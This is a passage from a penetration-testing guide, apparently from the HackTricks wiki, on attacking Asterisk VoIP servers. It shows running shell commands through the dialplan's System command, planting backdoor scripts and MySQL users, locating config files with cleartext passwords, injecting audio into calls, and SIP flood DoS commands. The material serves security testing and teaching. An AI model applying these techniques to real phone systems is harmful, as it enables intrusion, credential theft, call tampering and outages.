|
same => n,System(echo "Called at $(date)" >> /tmp/call_log.txt)
|
|
```
|
|
|
|
There is command called **`Shell`** that could be used **instead of `System`** to execute system commands if necessary.
|
|
|
|
{% hint style="warning" %}
|
|
If the server is **disallowing the use of certain characters** in the **`System`** command (like in Elastix), check if the web server allows to **create files somehow inside the system** (like in Elastix or trixbox), and use it to **create a backdoor script** and then use **`System`** to **execute** that **script**.
|
|
{% endhint %}
|
|
|
|
#### Interesting local files and permissions
|
|
|
|
* **`sip.conf`** -> Contains the password of SIP users.
|
|
* If the **Asterisk server is running as root**, you could compromise root
|
|
* **mysql root user** might **doesn't have any password**.
|
|
* this could be used to create a new mysql user as backdoor
|
|
* **`FreePBX`**
|
|
* **`amportal.conf`** -> Contains the password of the web panel administrator (FreePBX)
|
|
* **`FreePBX.conf`** -> Constains the password of the user FreePBXuser used to access the database
|
|
* this could be used to create a new mysql user as backdoor
|
|
* **`Elastix`**
|
|
* **`Elastix.conf`** -> Contains several passwords in clear text like mysql root pass, IMAPd pass, web admin pass
|
|
* **Several folders** will belong to the compromised asterisk user (if not running as root). This user can read the previous files and also controls the configuration, so he could make Asterisk to load other backdoored binaries when executed.
|
|
|
|
### RTP Injection
|
|
|
|
It's possible to insert a **`.wav`** in converstions using tools such as **`rtpinsertsound`** (`sudo apt install rtpinsertsound`) and **`rtpmixsound`** (`sudo apt install rtpmixsound`).
|
|
|
|
Or you could use the scripts from [http://blog.pepelux.org/2011/09/13/inyectando-trafico-rtp-en-una-conversacion-voip/](http://blog.pepelux.org/2011/09/13/inyectando-trafico-rtp-en-una-conversacion-voip/) to **scan conversations** (**`rtpscan.pl`**), send a `.wav` to a conversation (**`rtpsend.pl`**) and **insert noise** in a conversation (**`rtpflood.pl`**).
|
|
|
|
### DoS
|
|
|
|
There are several ways to try to achieve DoS in VoIP servers.
|
|
|
|
* **`SIPPTS flood`** from [**sippts**](https://github.com/Pepelux/sippts)**: SIPPTS flood sends unlimited messages to the target.
|
|
* `sippts flood -i 10.10.0.10 -m invite -v`
|
|
* **`SIPPTS ping`** from [**sippts**](https://github.com/Pepelux/sippts)**: SIPPTS ping makes a SIP ping to see the server response time.
|
|
* `sippts ping -i 10.10.0.10`
|
|
* [**IAXFlooder**](https://www.kali.org/tools/iaxflood/): DoS IAX protocol used by Asterisk
|
|
* [**inviteflood**](https://github.com/foreni-packages/inviteflood/blob/master/inviteflood/Readme.txt): A tool to perform SIP/SDP INVITE message flooding over UDP/IP.
|
|
* [**rtpflood**](https://www.kali.org/tools/rtpflood/): Send several well formed RTP packets. Its needed to know the RTP ports that are being used (sniff first).
|
|
* [**SIPp**](https://github.com/SIPp/sipp): Allows to analyze and generate SIP traffic. so it can be used to DoS also.
|
|
* [**SIPsak**](https://github.com/nils-ohlmeier/sipsak): SIP swiss army knife. Can also be used to perform SIP attacks.
|
|
* Fuzzers: [**protos-sip**](https://www.kali.org/tools/protos-sip/), [**voiper**](https://github.com/gremwell/voiper).
|
|
|
|
### OS Vulnerabilities
|
|
|
|
The easiest way to install a software such as Asterisk is to download an **OS distribution** that has it already installed, such as: **FreePBX, Elastix, Trixbox**... The problem with those is that once it's working sysadmins might **not update them again** and **vulnerabilities** are going to be discovered with time.
|
|
|
|
## References
|
|
|
|
* [https://github.com/Pepelux/sippts/wiki](https://github.com/Pepelux/sippts/wiki)
|
|
* [https://github.com/EnableSecurity/sipvicious](https://github.com/EnableSecurity/sipvicious)
|
|
* [http://blog.pepelux.org/](http://blog.pepelux.org/)
|
|
* [https://www.rtpbleed.com/](https://www.rtpbleed.com/)
|
|
* [https://medium.com/vartai-security/practical-voip-penetration-testing-a1791602e1b4](https://medium.com/vartai-security/practical-voip-penetration-testing-a1791602e1b4)
|
|
* [https://resources.enablesecurity.com/resources/sipdigestleak-tut.pdf](https://resources.enablesecurity.com/resources/sipdigestleak-tut.pdf)
|
|
|
|
{% hint style="success" %}
|
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
|
|
|
|
**Get a hacker's perspective on your web apps, network, and cloud**
|
|
|
|
**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports.
|
|
|
|
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|
|
{% endhint %}
|